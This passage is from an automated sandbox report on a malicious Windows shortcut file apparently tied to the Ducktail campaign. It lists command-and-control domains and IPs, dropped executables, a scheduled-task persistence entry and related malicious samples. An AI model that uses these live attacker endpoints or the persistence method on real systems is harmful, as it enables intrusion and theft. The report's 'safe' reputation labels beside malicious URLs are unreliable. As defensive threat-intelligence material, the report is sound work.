        https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118ba816f412b881e3aaad6d408d85d0439false
        • Avira URL Cloud: safe
        		unknown
        http://206.206.126.252:8008/client/wsfalse
        • Avira URL Cloud: safe
        		unknown
        https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118a4d29dc2b42a1fdfc3fcf445b5e1ec79false
        • Avira URL Cloud: safe
        		unknown
        https://uyt1n8ded9fb380.com/StaticFile/RdpService/54false
        • Avira URL Cloud: safe
        		unknown
        https://uyt1n8ded9fb380.com/file2/322f9cade6edf27754e99908a3b613cbb2870b90ee66165254085f7c8fc244f7da5e56b571757f523ab1b74f0b2fa31feffd1e9fe8161112e75692567601712fb0e25e562d6b8a48e104a3092fb281311ceea3263b30f8d001611aa592f7120974449bb2c8f98c07211ad54ea73548effalse
        • Avira URL Cloud: safe
        		unknown
        https://uyt1n8ded9fb380.com/file2/30bb492ec87899a2b4a8fa5c9eeec469bdf1331e13e733bf21c620f0bb30aac1548c78ec9055a01bf495c56498955f53f6c825ee68079bbe4ffef478e9254d76abc75433b29236d6d4ad3a1ad4ad48435e9f0cbebbc164349fd84634f30e15affalse
        • Avira URL Cloud: safe
        		unknown
        https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118eae6d565cd3eb81d1af68992a4aa54bafalse
        • Avira URL Cloud: safe
        		unknown
        http://23.88.71.29:8000/client/wsfalse
        • Avira URL Cloud: safe
        		unknown
        https://uyt1n8ded9fb380.com/file2/71bce99b7502b19ff2a07905ab2d1339c709feba29d711b34cdd49a281e353309644c5163adc6fb4a31548ae03ae3e92419435881eeebe7f4ae1c2626a34d7ec2fa7eb88b6aca77f088cd4d49b095045c28535df70e5ab5d0a2b5b0c8ad3e83b6c86bda9d5d720ef55b509d4734a348efalse
        • Avira URL Cloud: safe
        		unknown
        http://uyt1n8ded9fb380.com/api/checkfalse
        • Avira URL Cloud: safe
        		unknown
        https://uyt1n8ded9fb380.com/JxSkX6false
        • Avira URL Cloud: safe
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://html4/loose.dtdpowershell.exe, 0000000A.00000002.7579941472.000001ECAC397000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000012.00000002.8186872451.0000019945B46000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000012.00000000.7304859120.00007FF60776A000.00000002.00000001.01000000.00000009.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://uyt1n8ded9fb380.compowershell.exe, 00000002.00000002.7058905172.000002BBD2B6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.7058905172.000002BBD241B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.6961462229.00000221DBE6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.7324096874.000001EC9BCF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.7324096874.000001EC9D1F2000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://pesterbdd.com/images/Pester.pngXz9powershell.exe, 00000002.00000002.7058905172.000002BBD241B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.6961462229.00000221DBE6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.7324096874.000001EC9BB4E000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://aka.ms/nativeaot-csvczHost.exe, myRdpService.exefalse
          		high
          http://uyt1n8ded9fb380.compowershell.exe, 0000000A.00000002.7324096874.000001EC9D1F2000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://contoso.com/Licensepowershell.exe, 0000000A.00000002.7579941472.000001ECAB99C000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://uyt1n8ded9fb380.com/file2/30bb492ec87899a2b4a8fa5c9eeec469bdf1331e13e733bf21c620f0bb30aac154powershell.exe, 0000000A.00000002.7324096874.000001EC9BD2F000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://.csspowershell.exe, 0000000A.00000002.7579941472.000001ECAC397000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000012.00000002.8186872451.0000019945B46000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000012.00000000.7304859120.00007FF60776A000.00000002.00000001.01000000.00000009.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://github.com/dotnet/runtimepowershell.exe, 0000000A.00000002.7579941472.000001ECABC25000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000012.00000002.8186872451.0000019945248000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000012.00000002.8195035980.00007FF607651000.00000002.00000001.01000000.00000009.sdmpfalse
              		high
              http://www.apache.org/licenses/LICENSE-2.0.htmlXz9powershell.exe, 00000002.00000002.7058905172.000002BBD241B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.6961462229.00000221DBE6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.7324096874.000001EC9BB4E000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidYpowershell.exe, 0000000A.00000002.7579941472.000001ECAC397000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000012.00000002.8186872451.0000019945B46000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000012.00000000.7304859120.00007FF60776A000.00000002.00000001.01000000.00000009.sdmpfalse
                  		high
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidsvczHost.exe, svczHost.exe, 00000012.00000002.8194597435.00007FF6074DF000.00000004.00000001.01000000.00000009.sdmp, myRdpService.exefalse
                    		high
                    https://aka.ms/dotnet-warnings/powershell.exe, 0000000A.00000002.7579941472.000001ECAC397000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.7579941472.000001ECABC25000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000012.00000002.8194597435.00007FF6074DF000.00000004.00000001.01000000.00000009.sdmp, svczHost.exe, 00000012.00000002.8186872451.0000019945B46000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000012.00000000.7304859120.00007FF60776A000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000012.00000002.8186872451.0000019945248000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000012.00000002.8195035980.00007FF607651000.00000002.00000001.01000000.00000009.sdmp, myRdpService.exefalse
                      		high
                      http://schemas.opepowershell.exe, 00000006.00000002.6989031377.00000221F44EC000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: safe
                      		unknown
                      https://uyt1n8ded9fb380.com/StaticFile/RdpService/54hsvczHost.exe, 00000012.00000002.8185097351.00000199448A8000.00000004.00001000.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://aka.ms/nativeaot-compatibilitymyRdpService.exefalse
                        		high
                        https://contoso.com/powershell.exe, 0000000A.00000002.7579941472.000001ECAB99C000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.7089746889.000002BBE226A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.6961462229.00000221DD254000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.6982088599.00000221EBC7A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.7579941472.000001ECAB99C000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://uyt1n8ded9fb380.com/file2/c0fcfa43a58d04bbdeb124cc853de92c71f413d9845fe6e1a687f68f03777eb45bpowershell.exe, 00000002.00000002.7058905172.000002BBD28D2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.7058905172.000002BBD21F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.6961462229.00000221DBC01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.7579941472.000001ECAC397000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.7324096874.000001EC9B921000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000012.00000002.8194597435.00007FF6074DF000.00000004.00000001.01000000.00000009.sdmp, svczHost.exe, 00000012.00000002.8186872451.0000019945B46000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000012.00000000.7304859120.00007FF60776A000.00000002.00000001.01000000.00000009.sdmp, myRdpService.exefalse
                              		high
                              https://uyt1n8ded9fb380.com/file3/15c00ea36e9730cbe066155b6df42f28e74ca16ac92a992456106ac76962068b98powershell.exe, 00000002.00000002.7058905172.000002BBD25DD000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://.jpgpowershell.exe, 0000000A.00000002.7579941472.000001ECAC397000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000012.00000002.8186872451.0000019945B46000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000012.00000000.7304859120.00007FF60776A000.00000002.00000001.01000000.00000009.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://uyt1n8ded9fb380.com/file2/322f9cade6edf27754e99908a3b613cbb2870b90ee66165254085f7c8fc244f7dapowershell.exe, 00000002.00000002.7058905172.000002BBD2807000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.7089746889.000002BBE23B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.7089746889.000002BBE226A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.6961462229.00000221DD254000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.6982088599.00000221EBC7A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.7579941472.000001ECAB99C000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000006.00000002.6961462229.00000221DCF85000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000006.00000002.6986575195.00000221F3E20000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.6961462229.00000221DBE6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.7324096874.000001EC9C5F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c3211873772049powershell.exe, 00000002.00000002.7058905172.000002BBD2807000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.6961462229.00000221DD101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.6961462229.00000221DCF85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.7324096874.000001EC9BB4E000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000006.00000002.6961462229.00000221DBE6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.7324096874.000001EC9BE9F000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118eae6d565powershell.exe, 0000000A.00000002.7324096874.000001EC9BD2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.7324096874.000001EC9D1F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://uyt1n8ded9fb380.com/file2/e0123bbfddb76d0a721e69812ef33c456abeca67f6a6de3218a4121f769efaecc8powershell.exe, 00000002.00000002.7058905172.000002BBD2807000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.6961462229.00000221DD101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.6961462229.00000221DCF85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.7324096874.000001EC9BB4E000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://go.micropowershell.exe, 00000006.00000002.6961462229.00000221DCA48000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://github.com/MartinKuschnik/WmiLightsvczHost.exe, 00000012.00000002.8186872451.0000019945248000.00000004.00001000.00020000.00000000.sdmpfalse
                                          		high
                                          http://pesterbdd.com/images/Pester.pnghpowershell.exe, 00000006.00000002.6961462229.00000221DD0D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.6961462229.00000221DD101000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://aka.ms/nativeaot-compatibilityypowershell.exe, 0000000A.00000002.7579941472.000001ECAC397000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000012.00000002.8186872451.0000019945B46000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000012.00000000.7304859120.00007FF60776A000.00000002.00000001.01000000.00000009.sdmpfalse
                                            		high
                                            https://contoso.com/Iconpowershell.exe, 0000000A.00000002.7579941472.000001ECAB99C000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://uyt1n8ded9fb380.com/file2/4c4ffc93c89dfb9b826b1b24bd745331d0c2aafb3bfb560c0ae79c0e2962291542powershell.exe, 00000006.00000002.6961462229.00000221DBE6A000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.6961462229.00000221DD101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.6961462229.00000221DCF85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.7324096874.000001EC9BB4E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://aka.ms/winsvr-2022-pshelpXz9powershell.exe, 00000006.00000002.6961462229.00000221DBE6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.7324096874.000001EC9C5F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118a4d29dc2powershell.exe, 00000002.00000002.7058905172.000002BBD2807000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://github.com/Pester/PesterXz9powershell.exe, 00000002.00000002.7058905172.000002BBD241B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.6961462229.00000221DBE6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.7324096874.000001EC9BB4E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118ba816f41powershell.exe, 00000002.00000002.7058905172.000002BBD28D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.7058905172.000002BBD2B6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.7058905172.000002BBD2FDA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://crl.microsofpowershell.exe, 00000006.00000002.6987209340.00000221F401F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://uyt1n8ded9fb380.com/file2/71bce99b7502b19ff2a07905ab2d1339c709feba29d711b34cdd49a281e3533096powershell.exe, 0000000A.00000002.7324096874.000001EC9B921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.7324096874.000001EC9BB4E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://crl.mwpowershell.exe, 0000000A.00000002.7753000643.000001ECB3D57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000006.00000002.6961462229.00000221DBE6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.7324096874.000001EC9BE9F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://aka.ms/nativeaot-compatibilityYsvczHost.exe, 00000012.00000000.7304859120.00007FF60776A000.00000002.00000001.01000000.00000009.sdmpfalse
                                                        		high
                                                        https://github.com/Pester/Pesterhpowershell.exe, 00000006.00000002.6961462229.00000221DD0D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.6961462229.00000221DD101000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.apache.org/licenses/LICENSE-2.0.htmlhpowershell.exe, 00000006.00000002.6961462229.00000221DD0D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.6961462229.00000221DD101000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://aka.ms/GlobalizationInvariantModepowershell.exe, 0000000A.00000002.7579941472.000001ECAC397000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000012.00000002.8194597435.00007FF6074DF000.00000004.00000001.01000000.00000009.sdmp, svczHost.exe, 00000012.00000002.8186872451.0000019945B46000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000012.00000000.7304859120.00007FF60776A000.00000002.00000001.01000000.00000009.sdmp, myRdpService.exefalse
                                                              		high
                                                              https://aka.ms/pscore68powershell.exe, 00000002.00000002.7058905172.000002BBD21F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.6961462229.00000221DBC01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.7324096874.000001EC9B921000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://uyt1n8ded9fb380.com:443/xsvczHost.exe, 00000012.00000002.8185097351.00000199448B7000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000012.00000002.8185097351.00000199448A8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://oneget.orgpowershell.exe, 00000006.00000002.6961462229.00000221DCF85000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown

                                                                World Map of Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public IPs

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                104.21.86.219
                                                                		uyt1n8ded9fb380.comUnited States
                                                                		13335CLOUDFLARENETUStrue
                                                                206.206.126.252
                                                                		unknownUnited States
                                                                		13332HYPEENT-SJUSfalse
                                                                23.88.71.29
                                                                		unknownUnited States
                                                                		18978ENZUINC-USfalse

                                                                General Information

                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1551875
                                                                Start date and time:2024-11-08 11:27:19 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 11m 16s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2021, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                Run name:Suspected VM Detection
                                                                Number of analysed new started processes analysed:46
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:eQwUFcwrXk.lnk
                                                                Detection:MAL
                                                                Classification:mal100.troj.expl.evad.winLNK@66/58@1/3
                                                                EGA Information:Failed
                                                                HCA Information:Failed
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .lnk

                                                                Warnings

                                                                • Exclude process from analysis (whitelisted): RuntimeBroker.exe, backgroundTaskHost.exe
                                                                • Excluded IPs from analysis (whitelisted): 52.109.0.91, 52.111.236.23, 52.113.194.132, 52.109.20.48, 51.104.15.253, 142.250.65.195, 52.111.227.14
                                                                • Excluded domains from analysis (whitelisted): prod.ols.live.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, onedscolprduks04.uksouth.cloudapp.azure.com, ctldl.windowsupdate.com, s-0005-office.config.skype.com, prod.nexusrules.live.com.akadns.net, ecs-office.s-0005.s-msedge.net, login.live.com, s-0005.s-msedge.net, config.officeapps.live.com, us.configsvc1.live.com.akadns.net, wus-azsc-config.officeapps.live.com, officeclient.microsoft.com, ecs.office.trafficmanager.net, www.gstatic.com, nexusrules.officeapps.live.com, ols.officeapps.live.com
                                                                • Execution Graph export aborted for target myRdpService.exe, PID 8188 because there are no executed function
                                                                • Execution Graph export aborted for target powershell.exe, PID 4080 because it is empty
                                                                • Execution Graph export aborted for target powershell.exe, PID 4468 because it is empty
                                                                • Execution Graph export aborted for target powershell.exe, PID 5056 because it is empty
                                                                • Execution Graph export aborted for target powershell.exe, PID 8708 because it is empty
                                                                • Execution Graph export aborted for target powershell.exe, PID 9184 because it is empty
                                                                • Execution Graph export aborted for target svczHost.exe, PID 4540 because there are no executed function
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                • VT rate limit hit for: eQwUFcwrXk.lnk

                                                                Simulations

                                                                Behavior and APIs

                                                                TimeTypeDescription
                                                                05:29:27API Interceptor1055x Sleep call for process: powershell.exe modified
                                                                11:30:15Task SchedulerRun new task: zServicecakoi10 path: C:\Windows\Temp\svczHost.exe s>cakoi10 uyt1n8ded9fb380.com

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                104.21.86.219O5PR3i6ILA.lnkGet hashmaliciousDucktailBrowse
                                                                • uyt1n8ded9fb380.com/api/check
                                                                aQuwmiym51.lnkGet hashmaliciousDucktailBrowse
                                                                • uyt1n8ded9fb380.com/api/check
                                                                U82W1yZAYQ.lnkGet hashmaliciousDucktailBrowse
                                                                • uyt1n8ded9fb380.com/api/check
                                                                About-Us.docx lnk.lnkGet hashmaliciousDucktailBrowse
                                                                • uyt1n8ded9fb380.com/api/check
                                                                K05MQ5BcC8.lnkGet hashmaliciousUnknownBrowse
                                                                • uyt1n8ded9fb380.com/api/check
                                                                4YgQ2xN41W.lnkGet hashmaliciousDucktailBrowse
                                                                • uyt1n8ded9fb380.com/api/check
                                                                Meeting-Registration pdf lnk.lnkGet hashmaliciousDucktailBrowse
                                                                • uyt1n8ded9fb380.com/api/check
                                                                K9ZFXlZRuI.lnkGet hashmaliciousDucktailBrowse
                                                                • uyt1n8ded9fb380.com/api/check
                                                                U7LTwStlEf.lnkGet hashmaliciousDucktailBrowse
                                                                • uyt1n8ded9fb380.com/api/check

                                                                Domains

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                uyt1n8ded9fb380.comEERNI7eIS7.lnkGet hashmaliciousDucktailBrowse
                                                                • 172.67.137.62
                                                                cOOhDuNWt7.lnkGet hashmaliciousDucktailBrowse
                                                                • 172.67.137.62
                                                                O5PR3i6ILA.lnkGet hashmaliciousDucktailBrowse
                                                                • 104.21.86.219
                                                                SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET lnk.lnkGet hashmaliciousDucktailBrowse
                                                                • 172.67.137.62
                                                                aQuwmiym51.lnkGet hashmaliciousDucktailBrowse
                                                                • 104.21.86.219
                                                                gW6FHWNFzR.lnkGet hashmaliciousDucktailBrowse
                                                                • 172.67.137.62
                                                                U82W1yZAYQ.lnkGet hashmaliciousDucktailBrowse
                                                                • 104.21.86.219
                                                                ZGMW2wgPzY.lnkGet hashmaliciousDucktailBrowse
                                                                • 172.67.137.62
                                                                z0gG2GA9vG.lnkGet hashmaliciousDucktailBrowse
                                                                • 172.67.137.62
                                                                About-Us.docx lnk.lnkGet hashmaliciousDucktailBrowse
                                                                • 104.21.86.219

                                                                ASNs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                CLOUDFLARENETUSEERNI7eIS7.lnkGet hashmaliciousDucktailBrowse
                                                                • 172.67.137.62
                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                • 172.67.133.135
                                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                • 104.21.5.155
                                                                http://laughterchefs.ru/dotGet hashmaliciousUnknownBrowse
                                                                • 188.114.96.3
                                                                cOOhDuNWt7.lnkGet hashmaliciousDucktailBrowse
                                                                • 162.159.61.3
                                                                O5PR3i6ILA.lnkGet hashmaliciousDucktailBrowse
                                                                • 104.21.86.219
                                                                https://nvcourts.gov/Get hashmaliciousHTMLPhisherBrowse
                                                                • 104.17.25.14
                                                                SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET lnk.lnkGet hashmaliciousDucktailBrowse
                                                                • 172.64.41.3
                                                                https://www.capcut.com/download-guidance?download_url=https%3A%2F%2Flf16-capcut.faceulv.com%2Fobj%2Fcapcutpc-packages-us%2Finstaller%2Fcapcut_capcutpc_0_1.2.6_installer.exeGet hashmaliciousUnknownBrowse
                                                                • 172.64.41.3
                                                                https://support-facebook.kb.help/your-facebook-account-has-been-restricted/Get hashmaliciousHTMLPhisherBrowse
                                                                • 104.16.123.96
                                                                HYPEENT-SJUSEERNI7eIS7.lnkGet hashmaliciousDucktailBrowse
                                                                • 206.206.126.252
                                                                cOOhDuNWt7.lnkGet hashmaliciousDucktailBrowse
                                                                • 206.206.126.252
                                                                O5PR3i6ILA.lnkGet hashmaliciousDucktailBrowse
                                                                • 206.206.126.252
                                                                SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET lnk.lnkGet hashmaliciousDucktailBrowse
                                                                • 206.206.126.252
                                                                gW6FHWNFzR.lnkGet hashmaliciousDucktailBrowse
                                                                • 206.206.126.252
                                                                U82W1yZAYQ.lnkGet hashmaliciousDucktailBrowse
                                                                • 206.206.126.252
                                                                ZGMW2wgPzY.lnkGet hashmaliciousDucktailBrowse
                                                                • 206.206.126.252
                                                                z0gG2GA9vG.lnkGet hashmaliciousDucktailBrowse
                                                                • 206.206.126.252
                                                                About-Us.docx lnk.lnkGet hashmaliciousDucktailBrowse
                                                                • 206.206.126.252
                                                                Job-Description pdf lnk.lnkGet hashmaliciousDucktailBrowse
                                                                • 206.206.126.252

                                                                JA3 Fingerprints

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                3b5074b1b5d032e5620f69f9f700ff0eEERNI7eIS7.lnkGet hashmaliciousDucktailBrowse
                                                                • 104.21.86.219
                                                                cOOhDuNWt7.lnkGet hashmaliciousDucktailBrowse
                                                                • 104.21.86.219
                                                                monthly-eStatementForum120478962.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                • 104.21.86.219
                                                                O5PR3i6ILA.lnkGet hashmaliciousDucktailBrowse
                                                                • 104.21.86.219
                                                                SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET lnk.lnkGet hashmaliciousDucktailBrowse
                                                                • 104.21.86.219
                                                                monthly-eStatementForum120478962.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                • 104.21.86.219
                                                                https://support-facebook.kb.help/your-facebook-account-has-been-restricted/Get hashmaliciousHTMLPhisherBrowse
                                                                • 104.21.86.219
                                                                aQuwmiym51.lnkGet hashmaliciousDucktailBrowse
                                                                • 104.21.86.219
                                                                gW6FHWNFzR.lnkGet hashmaliciousDucktailBrowse
                                                                • 104.21.86.219
                                                                U82W1yZAYQ.lnkGet hashmaliciousDucktailBrowse
                                                                • 104.21.86.219

                                                                Dropped Files

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                C:\Windows\Temp\myRdpService.exeEERNI7eIS7.lnkGet hashmaliciousDucktailBrowse
